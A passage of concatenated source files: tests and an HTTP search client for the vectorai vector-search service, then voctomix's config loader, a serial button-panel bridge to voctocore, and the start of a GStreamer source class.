test_client._encode_documents_with_models_in_bulk(documents, models={'color': [test_text_encoder]})
assert 'color_vector_' in documents[0].keys()
assert len(documents[0]['color_vector_']) > 0
@pytest.mark.use_client
def test_multiprocess_insert(test_client, test_collection_name):
NUM_OF_DOCUMENTS_INSERTED = 10
if test_collection_name in test_client.list_collections():
test_client.delete_collection(test_collection_name)
documents = test_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED)
results = test_client.insert_documents(test_collection_name, documents, workers=5)
assert len(results['failed_document_ids']) == 0
assert test_collection_name in test_client.list_collections()
assert test_client.collection_stats(test_collection_name)['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED
test_client.delete_collection(test_collection_name)
@pytest.mark.use_client
def test_multiprocess_insert_with_error(test_client, test_collection_name):
NUM_OF_DOCUMENTS_INSERTED = 10
if test_collection_name in test_client.list_collections():
test_client.delete_collection(test_collection_name)
documents = test_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED)
documents.append({
'_id': 3,
'color': np.nan
})
# This should result in 1 failure
results = test_client.insert_documents(test_collection_name, documents, workers=5)
assert len(results['failed_document_ids']) == 1
assert test_collection_name in test_client.list_collections()
assert test_client.collection_stats(test_collection_name)['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED
test_client.delete_collection(test_collection_name)
@pytest.mark.use_client
def test_multiprocess_with_collection_client(test_collection_client, test_collection_name):
NUM_OF_DOCUMENTS_INSERTED = 10
if test_collection_client.collection_name in test_collection_client.list_collections():
test_collection_client.delete_collection()
documents = test_collection_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED)
results = test_collection_client.insert_documents(documents, workers=5)
assert len(results['failed_document_ids']) == 0
assert test_collection_client.collection_name in test_collection_client.list_collections()
assert test_collection_client.collection_stats()['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED
test_collection_client.delete_collection()
@pytest.mark.use_client
def test_multiprocess__with_error_with_collection_client(test_collection_client):
NUM_OF_DOCUMENTS_INSERTED = 10
if test_collection_client.collection_name in test_collection_client.list_collections():
test_collection_client.delete_collection()
documents = test_collection_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED)
documents.append({
'_id': 3,
'color': np.nan
})
# This should result in 1 failure
results = test_collection_client.insert_documents(documents, workers=5)
assert len(results['failed_document_ids']) == 1
assert test_collection_client.collection_name in test_collection_client.list_collections()
assert test_collection_client.collection_stats()['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED
test_collection_client.delete_collection()
```
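test__write_document_nested_field above pins down the behaviour of ViWriteClient.set_field: a dotted path is written into a nested dict, creating the leaf key when it is missing. A small sketch using only what those tests assert; the field name profile.embedding is illustrative.
```python
from vectorai.write import ViWriteClient

doc = {"profile": {}}
ViWriteClient.set_field("profile.embedding", doc=doc, value=[0.1, 0.2, 0.3])
assert doc == {"profile": {"embedding": [0.1, 0.2, 0.3]}}
```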
#### File: vectorai/api/search.py
```python
import io
import base64
import requests
from typing import Dict, List
class ViSearchClient:
"""
Search and Advanced Search Operations
"""
def __init__(self, username, api_key, url=None):
self.username = username
self.api_key = api_key
if url:
self.url = url
else:
self.url = "https://api.vctr.ai"
def _search(
self,
collection_name: str,
vector: List,
fields: List,
sum_fields: bool = True,
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Vector Similarity Search. Search a vector field with a vector, a.k.a Nearest Neighbors Search
Enables machine learning search with vector search. Search with a vector for the most similar vectors.
For example: search with a person's characteristics to find who is most similar (querying the "persons_characteristics_vector" field)::
Query person's characteristics as a vector:
[180, 40, 70] representing [height, age, weight]
Search Results:
[
{"name": <NAME>, "persons_characteristics_vector" : [180, 56, 71]},
{"name": <NAME>, "persons_characteristics_vector" : [180, 56, 65]},
...]
Args:
vector:
Vector, a list/array of floats that represents a piece of data.
collection_name:
Name of Collection
search_fields:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
"""
return requests.get(
url="{}/collection/search".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"vector": vector,
"sum_fields": sum_fields,
"search_fields": fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def hybrid_search(
self,
collection_name: str,
text: str,
vector: List,
fields: List,
text_fields: List,
sum_fields: bool = True,
metric: str = "cosine",
min_score=None,
traditional_weight=0.075,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Search a text field with vector and text using Vector Search and Traditional Search
Vector similarity search + Traditional Fuzzy Search with text and vector.
Args:
text:
Text Search Query (not encoded as vector)
vector:
Vector, a list/array of floats that represents a piece of data.
text_fields:
Text fields to search against
traditional_weight:
Multiplier of traditional search. A value of 0.025~0.1 is good.
fuzzy:
Fuzziness of the search. A value of 1-3 is good.
join:
Whether to consider cases where there is a space in the word. E.g. Go Pro vs GoPro.
collection_name:
Name of Collection
search_fields:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/hybrid_search".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"text": text,
"vector": vector,
"search_fields": fields,
"text_fields": text_fields,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"traditional_weight": traditional_weight,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def search_by_id(
self,
collection_name: str,
document_id: str,
field: str,
sum_fields: bool = True,
metric: str = "cosine",
min_score=0,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Single Product Recommendations (Search by an id)
Recommendation by retrieving the vector from the specified id's document. Then performing a search with that vector.
Args:
document_id:
ID of a document
collection_name:
Name of Collection
search_field:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/search_by_id".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"document_id": document_id,
"search_field": field,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def search_by_ids(
self,
collection_name: str,
document_ids: List,
field: str,
vector_operation: str = "mean",
sum_fields: bool = True,
metric: str = "cosine",
min_score=0,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Multi Product Recommendations (Search by ids)
Recommendation by retrieving the vectors from the specified list of ids documents. Then performing a search with an aggregated vector that is the sum (depends on vector_operation) of those vectors.
Args:
document_ids:
IDs of documents
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
collection_name:
Name of Collection
search_field:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/search_by_ids".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"document_ids": document_ids,
"search_field": field,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def search_by_positive_negative_ids(
self,
collection_name: str,
positive_document_ids: List,
negative_document_ids: List,
field: str,
vector_operation: str = "mean",
sum_fields: bool = True,
metric: str = "cosine",
min_score=0,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Multi Product Recommendations with Likes and Dislikes (Search by ids)
Recommendation by retrieving the vectors from the specified list of positive and negative ids documents. Then performing a search with an aggregated vector that is the sum (depends on vector_operation) of positive id vectors minus the negative id vectors.
Args:
positive_document_ids:
Positive Document IDs to get recommendations for, and the weightings of each document
negative_document_ids:
Negative Document IDs to get recommendations for, and the weightings of each document
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
collection_name:
Name of Collection
search_field:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/search_by_positive_negative_ids".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"positive_document_ids": positive_document_ids,
"negative_document_ids": negative_document_ids,
"search_field": field,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def search_with_positive_negative_ids_as_history(
self,
collection_name: str,
vector: List,
positive_document_ids: List,
negative_document_ids: List,
field: str,
vector_operation: str = "mean",
sum_fields: bool = True,
metric: str = "cosine",
min_score=0,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Search with Likes and Dislikes as history (Search by ids)
Search by retrieving the vectors from the specified list of positive and negative ids documents. Then performing a search with search query vector and aggregated vector, that is the sum (depends on vector_operation) of positive id vectors minus the negative id vectors.
Args:
vector:
Vector, a list/array of floats that represents a piece of data.
positive_document_ids:
Positive Document IDs to get recommendations for, and the weightings of each document
negative_document_ids:
Negative Document IDs to get recommendations for, and the weightings of each document
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
collection_name:
Name of Collection
search_field:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/search_with_positive_negative_ids_as_history".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"vector": vector,
"positive_document_ids": positive_document_ids,
"negative_document_ids": negative_document_ids,
"search_field": field,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def advanced_search(
self,
collection_name: str,
multivector_query: Dict,
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Vector Similarity Search. Support for multiple vectors, vector weightings, facets and filtering
Advanced Vector Similarity Search enables machine learning search with vector search. Search with multiple vectors for the most similar documents.
For example: search with a product's image and description vectors to find the most similar products by what it looks like and what it is described to do.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
multivector_query:
Query for advance search that allows for multiple vector and field querying
Example:
>>> vi_client = ViCollectionClient(username, api_key, collection_name, url)
>>> advanced_search_query = {
'text' : {'vector': encode_question("How do I cluster?"), 'fields' : ['function_vector_']}
}
>>> vi_client.advanced_search(advanced_search_query)
"""
return requests.post(
url="{}/collection/advanced_search".format(self.url),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"multivector_query": multivector_query,
"facets": facets,
"filters": filters,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_hybrid_search(
self,
collection_name: str,
text: str,
multivector_query: Dict,
text_fields: List,
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced search of a text field with vector and text using Vector Search and Traditional Search
Advanced Vector similarity search + Traditional Fuzzy Search with text and vector.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
multivector_query:
Query for advanced search that allows for multiple vector and field querying
text:
Text Search Query (not encoded as vector)
text_fields:
Text fields to search against
traditional_weight:
Multiplier of traditional search. A value of 0.025~0.1 is good.
fuzzy:
Fuzziness of the search. A value of 1-3 is good.
join:
Whether to consider cases where there is a space in the word. E.g. Go Pro vs GoPro.
"""
return requests.post(
url="{}/collection/advanced_hybrid_search".format(self.url),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"text": text,
"multivector_query": multivector_query,
"text_fields": text_fields,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_search_by_id(
self,
collection_name: str,
document_id: str,
fields: Dict,
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Single Product Recommendations (Search by an id).
For example: search with the id of a product in the database, using the product's image and description vectors to find the most similar products by what it looks like and what it is described to do.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
document_id:
ID of a document
search_fields:
Vector fields to search against, and the weightings for them.
"""
return requests.post(
url="{}/collection/advanced_search_by_id".format(self.url),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"document_id": document_id,
"search_fields": fields,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_search_by_ids(
self,
collection_name: str,
document_ids: Dict,
fields: Dict,
vector_operation: str = "mean",
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Multi Product Recommendations (Search by ids).
For example: search with multiple ids of products in the database, using the products' image and description vectors to find the most similar products by what they look like and what they are described to do.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
You can also give weightings on each product, e.g. product ID-A weighted 100% whilst product ID-B 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
document_ids:
Document IDs to get recommendations for, and the weightings of each document
search_fields:
Vector fields to search against, and the weightings for them.
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
"""
return requests.post(
url="{}/collection/advanced_search_by_ids".format(self.url),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"document_ids": document_ids,
"search_fields": fields,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_search_by_positive_negative_ids(
self,
collection_name: str,
positive_document_ids: Dict,
negative_document_ids: Dict,
fields: Dict,
vector_operation: str = "mean",
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Multi Product Recommendations with likes and dislikes (Search by ids).
For example: search with multiple ids of liked and disliked products in the database, then use the products' image and description vectors to find the most similar products to the positives and the most dissimilar products to the negatives, by what they look like and what they are described to do.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
You can also give weightings on each product, e.g. product ID-A weighted 100% whilst product ID-B 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
positive_document_ids:
Positive Document IDs to get recommendations for, and the weightings of each document
negative_document_ids:
Negative Document IDs to get recommendations for, and the weightings of each document
search_fields:
Vector fields to search against, and the weightings for them.
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
"""
return requests.post(
url="{}/collection/advanced_search_by_positive_negative_ids".format(
self.url
),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"positive_document_ids": positive_document_ids,
"negative_document_ids": negative_document_ids,
"search_fields": fields,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_search_with_positive_negative_ids_as_history(
self,
collection_name: str,
vector:List,
positive_document_ids: Dict,
negative_document_ids: Dict,
fields: Dict,
vector_operation: str = "mean",
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Search with Likes and Dislikes as history
For example: vector search of a query vector together with multiple ids of liked and disliked products in the database, then use the products' image and description vectors to find the most similar products to the positives and the most dissimilar products to the negatives, by what they look like and what they are described to do.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
You can also give weightings on each product, e.g. product ID-A weighted 100% whilst product ID-B 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vector similarity search scores into one score or keep them separate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
positive_document_ids:
Positive Document IDs to get recommendations for, and the weightings of each document
negative_document_ids:
Negative Document IDs to get recommendations for, and the weightings of each document
search_fields:
Vector fields to search against, and the weightings for them.
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
vector:
Vector, a list/array of floats that represents a piece of data
"""
return requests.post(
url="{}/collection/advanced_search_with_positive_negative_ids_as_history".format(
self.url
),
json={
"username": self.username,
"api_key": self.api_key,
"vector": vector,
"collection_name": collection_name,
"positive_document_ids": positive_document_ids,
"negative_document_ids": negative_document_ids,
"search_fields": fields,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
```
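Each method of ViSearchClient above is a thin wrapper around a single HTTP request, so a query is just one method call. A hedged sketch of a recommendation-by-id query using search_by_id; the credentials, collection name, document id and field name are placeholders, not values from the project.
```python
from vectorai.api.search import ViSearchClient

client = ViSearchClient(username="my_username", api_key="my_api_key")

results = client.search_by_id(
    collection_name="products",
    document_id="some_document_id",
    field="description_vector_",
    metric="cosine",
    page_size=5,
)
```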
#### File: models/deployed/image.py
```python
import io
import base64
import requests
from .base import ViDeployedModel
class ViImage2Vec(ViDeployedModel):
def encode(self, image):
return requests.get(
url="{}/collection/encode_image".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": self.collection_name,
"image_url": image,
},
).json()
@property
def __name__(self):
if self._name is None:
return "deployed_image"
return self._name
@__name__.setter
def __name__(self, value):
self._name = value
class ViImageArray2Vec(ViDeployedModel):
def __init__(
self,
username,
api_key,
url=None,
collection_name="base",
vector_operation: str = "mean",
):
self.username = username
self.api_key = api_key
if url:
self.url = url
else:
self.url = "https://api.vctr.ai"
self.collection_name = collection_name
self.vector_operation = vector_operation
def encode(self, images):
# note: _vector_operation is an aggregation helper assumed to be provided elsewhere in the package
return _vector_operation(
[
requests.get(
url="{}/collection/encode_image".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": self.collection_name,
"image_url": image,
},
).json()
for image in images
],
vector_operation=self.vector_operation,
)
@property
def __name__(self):
if self._name is None:
return "deployed_image_array"
return self._name
@__name__.setter
def __name__(self, value):
self._name = value
``` |
{
"source": "0xflotus/voctomix",
"score": 3
} |
#### File: voctolight/lib/config.py
```python
import logging
import os.path
from configparser import ConfigParser
__all__ = ['Config']
def getlist(self, section, option):
return [x.strip() for x in self.get(section, option).split(',')]
def fetchServerConfig(self, conn):
log = logging.getLogger('Config')
log.info("reading server-config")
server_config = conn.fetchServerConfig()
log.info("merging server-config %s", server_config)
self.read_dict(server_config)
ConfigParser.getlist = getlist
ConfigParser.fetchServerConfig = fetchServerConfig
files = [
os.path.join(os.path.dirname(os.path.realpath(__file__)),
'../default-config.ini'),
os.path.join(os.path.dirname(os.path.realpath(__file__)),
'../config.ini'),
'/etc/voctomix/voctolight.ini',
'/etc/voctolight.ini',
os.path.expanduser('~/.voctolight.ini'),
]
Config = ConfigParser()
Config.read(files)
```
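Config above is a module-level ConfigParser with getlist and fetchServerConfig patched onto the class. The sketch below shows what getlist does with a comma-separated option, re-applying the same monkey patch so it runs standalone; the section and option names are illustrative, not taken from the shipped ini files.
```python
from configparser import ConfigParser

def getlist(self, section, option):
    return [x.strip() for x in self.get(section, option).split(',')]

ConfigParser.getlist = getlist

config = ConfigParser()
config.read_dict({'light': {'gpios': '17, 27, 22'}})
assert config.getlist('light', 'gpios') == ['17', '27', '22']
```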
#### File: example-scripts/voctopanel/voctopanel.py
```python
import atexit
import socket
import sys
import time
import serial
from lib.config import Config
server_address = Config.get("server", "address")
server_port = Config.get("server", "port")
panel_port = Config.get("panel", "port")
panel_speed = Config.get("panel", "speed")
panel_size = Config.get("panel", "size")
conn, ser = None, None
try:
conn = socket.create_connection((server_address, server_port))
except (ConnectionRefusedError, KeyboardInterrupt):
print("Could not connect to voctocore")
sys.exit()
@atexit.register
def close_conn():
global conn
conn and conn.close()
try:
ser = serial.Serial(panel_port, panel_speed, timeout=1)
except (ValueError, serial.SerialException):
print("Could not connect to voctopanel")
sys.exit()
@atexit.register
def close_pannel():
global ser
ser.close()
print("Entering main loop. Press Control-C to exit.")
try:
# just wait for keyboard interrupt in main thread
while True:
if True: #ser.in_waiting > 0:
try:
btn = ser.readline().decode("utf-8").strip()
except serial.serialutil.SerialException:
print("probably missed one button press")
# check whether this is a button press and, if so, strip the leading 'v'
if str(btn)[:1] == 'v':
btn = btn[1:]
try:
cm = Config.get("buttons", btn)
except Exception:
print("received an unknown or undefined button id")
continue
print(cm) #debug
print("Sending: '{}'".format(cm))
try:
conn.sendall(cm.encode('ascii') + b"\n")
except BrokenPipeError:
print("voctocore disconnected, trying to reconnect")
try:
conn = socket.create_connection((server_address, server_port))
print("Reconnected to voctocore")
except Exception:
pass
led = btn + 'o'
ser.write(led.encode())
else:
pass
#print(btn[:1])
else:
print('no input')
#time.sleep(1)
except KeyboardInterrupt:
print("")
```
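The panel protocol in the script above is simple: the serial device sends a line such as v2, a leading v marks a button press, and the remaining id is looked up in the [buttons] section of the configuration, which maps button ids to voctocore commands. A self-contained sketch of that lookup; the section contents below are illustrative, not the project's shipped configuration.
```python
from configparser import ConfigParser

config = ConfigParser()
config.read_dict({'buttons': {'1': 'set_video_a cam1', '2': 'set_video_a cam2'}})

line = 'v2'  # as read from the serial port
if line.startswith('v'):
    command = config.get('buttons', line[1:])
    # voctopanel would then send this command to voctocore, terminated by a newline
    assert command == 'set_video_a cam2'
```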
#### File: lib/sources/avsource.py
```python
import logging
from abc import ABCMeta, abstractmethod
from gi.repository import GLib
from lib.config import Config
from lib.args import Args
class AVSource(object, metaclass=ABCMeta):
def __init__(self,
class_name,
name,
has_audio=True,
has_video=True,
num_streams=None,
show_no_signal=False):
# create logging interface
self.log = logging.getLogger("%s[%s]" % (class_name, name))
# make sure we have at least something
assert has_audio or has_video
# remember things
self.class_name = class_name
self.name = name
self.has_audio = has_audio
self.has_video = has_video
# fetch audio streams from config (different for blinder source)
if name == "blinder":
self.audio_streams = Config.getBlinderAudioStreams()
else:
self.audio_streams = Config.getAudioStreams()
# remember if we shall show no-signal underlay
self.show_no_signal = show_no_signal and Config.getNoSignal()
# maybe initialize no signal watch dog
if self.show_no_signal:
# check if we have video to show no-signal message
assert self.has_video
# set timeout at which we check for signal loss
GLib.timeout_add(self.timer_resolution * 1000, self.do_timeout)
# this might get attached to the no-signal compositor's input sink
self.noSignalSink = None
@abstractmethod
def __str__(self):
raise NotImplementedError(
'__str__ not implemented for this source')
def attach(self, pipeline):
if self.show_no_signal:
# attach self.noSignalSink to no-signal compositor
self.noSignalSink = pipeline.get_by_name(
'compositor-{}'.format(self.name)).get_static_pad('sink_1')
def build_pipeline(self):
self.bin = "" if Args.no_bins else """
bin.(
name={class_name}-{name}
""".format(class_name=self.class_name, name=self.name)
self.bin += self.build_source()
if self.internal_audio_channels():
audioport = self.build_audioport()
if audioport:
audio_streams = self.audio_streams.get_stream_names(self.name)
self.bin += """
{audioport}
! queue
max-size-time=3000000000
name=queue-source-audio-{name}
! tee
name=source-audio-{name}
""".format(
audioport=audioport,
name=self.name
)
if not audio_streams:
self.bin += """
source-audio-{name}.
! queue
max-size-time=3000000000
name=queue-source-audio-fakesink-{name}
! fakesink
async=false
""".format(name=self.name)
for stream in audio_streams:
self.log.info("Creating audio streams '{}' from source '{}'".format(stream,self.name))
self.bin += """
source-audio-{name}.
! queue
max-size-time=3000000000
name=queue-audiomixmatrix-{stream}
! audiomixmatrix
name=audiomixmatrix-{stream}
in-channels={in_channels}
out-channels={out_channels}
matrix="{matrix}"
! {acaps}
! queue
name=queue-audio-{stream}
max-size-time=3000000000
! tee
name=audio-{stream}
""".format(
in_channels=self.internal_audio_channels(),
out_channels=Config.getAudioChannels(),
matrix=str(self.audio_streams.matrix(self.name,
stream,
Config.getAudioChannels(),
grid=self.get_valid_channel_numbers())
).replace("[", "<").replace("]", ">"),
acaps=Config.getAudioCaps(),
stream=stream,
name=self.name
)
if self.has_video:
if self.show_no_signal and Config.getNoSignal():
video = """
videotestsrc
name=canvas-{name}
pattern={nosignalpattern}
! textoverlay
name=nosignal-{name}
